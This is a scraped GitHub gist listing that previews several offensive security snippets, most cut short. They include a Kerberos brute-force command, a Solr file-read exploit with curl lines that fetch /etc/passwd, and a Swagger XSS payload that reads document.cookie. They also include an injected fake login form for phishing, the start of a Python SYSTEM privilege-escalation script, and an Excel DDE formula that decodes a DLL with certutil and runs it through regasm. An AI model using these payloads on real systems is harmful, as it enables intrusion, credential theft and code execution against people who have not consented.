With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
Boschko OlivierLaflamme
xct
/ kerberos_attacks_cheatsheet.md
Created
June 23, 2019 11:57
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
0xf4n9x
/ gist:2075ef36cc311a5e08aac983fc92e141
Created
March 17, 2021 14:33
Solr Arbitrary File Read 0day Vulnerability
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ip="192.168.1.12:8983" | |
| # curl -d '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://$ip/solr/db/config -H 'Content-type:application/json' | |
| # curl "http://$ip/solr/db/debug/dump?param=ContentStreams" -F "stream.url=file:///etc/passwd" |
pikpikcu
/ CVE-2020-16152.md
Created
March 8, 2021 03:59
POST /login.php5 HTTP/1.1
Accept: application/json
Connection: close
Content-Length: 100
Content-Type: application/json
{
"login_auth": 0,
"miniHiveUI": 1,
pikpikcu
/ swagerxss1.json
Created
February 23, 2021 11:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| swagger: "2.0", | |
| info: | |
| title: "Swagger Test Poc XSS", | |
| description: "Please to click Terms of service" | |
| termsOfService: "javascript:alert(document.cookie)" | |
| contact: | |
| name: "API Support", | |
| url: "javascript:alert(document.cookie)", | |
| email: "javascript:alert(document.cookie)" | |
| version: "1.0.1" |
dwisiswant0
/ wp-plugin-sqli.json
Created
July 1, 2020 17:08
gf Pattern for Detect SQL Injection in WordPress Plugin # Case-study: https://dl.packetstormsecurity.net/papers/general/detect-sql-wp.pdf
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "flags": "-HanrPz", | |
| "pattern": "('|\")SELECT[\\S+\\n\\r\\s]+FROM[\\S+\\n\\r\\s]+('|\").*(\\.|\\{).*[\\S+\\n\\r\\s]+;" | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var html = ` | |
| <div id=\"bg\" style=\"position: absolute; z-index: 100; width: 100%; height: 100%; background-color: #000000; opacity: 0.5; top: 0; left: 0; margin: 0\"> | |
| </div> | |
| <div id=\"form\" style=\"position: absolute; z-index: 150; font-family: Arial; background-color: #ffffff; width: 280px; height: 185px; top: 50%; left: 40%; padding: 10px\"> | |
| <p>An error occurred. Please login again.</p> | |
| <form id=\"phishingForm\""> | |
| <p>Username <input type=\"text\" name=\"username\"></p> | |
| <p>Password <input type=\"password\" name=\"password\"></p> | |
| <p><input type=\"submit\" value=\"Login\"></p> | |
| </form> |
makelariss
/ popshellslikeitsafriday.py
Last active
December 17, 2021 05:31
NT AUTHORITY\SYSTEM through Named Pipe Impersonation using Python
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: UTF-8 -*- | |
| from ctypes.wintypes import * | |
| from ctypes import * | |
| from enum import IntEnum | |
| # These libraries have the APIs we need | |
| kernel32 = WinDLL('kernel32', use_last_error=True) | |
| advapi32 = WinDLL('advapi32', use_last_error=True) | |
| psapi = WinDLL('psapi.dll', use_last_error=True) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| WEB | |
| 1 | |
| https://ringzer0team.com/IQY | |
| Selection=EntirePage | |
| Formatting=RTF | |
| PreFormattedTextToColumns=True | |
| ConsecutiveDelimitersAsOne=True | |
| SingleBlockTextImport=False | |
| DisableDateRecognition=False |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| =cmd|' /c more /E +12 %userprofile%\Downloads\poc.iqy > %temp%\poc.hex && certutil -decodehex %temp%\poc.hex %temp%\poc.dll && C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U %temp%\poc.dll'!'A1' |
enigma0x3
/ Get-NonstandardService.ps1
Last active
August 12, 2022 15:41
— forked from HarmJ0y/Get-NonstandardService.ps1
Get-NonstandardService
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-NonstandardService { | |
| <# | |
| .SYNOPSIS | |
| Returns services where the associated binaries are either not signed, or are | |
| signed by an issuer not matching 'Microsoft'. | |
| Author: Will Schroeder (@harmj0y) | |
| License: BSD 3-Clause | |
| Required Dependencies: None |
OlderNewer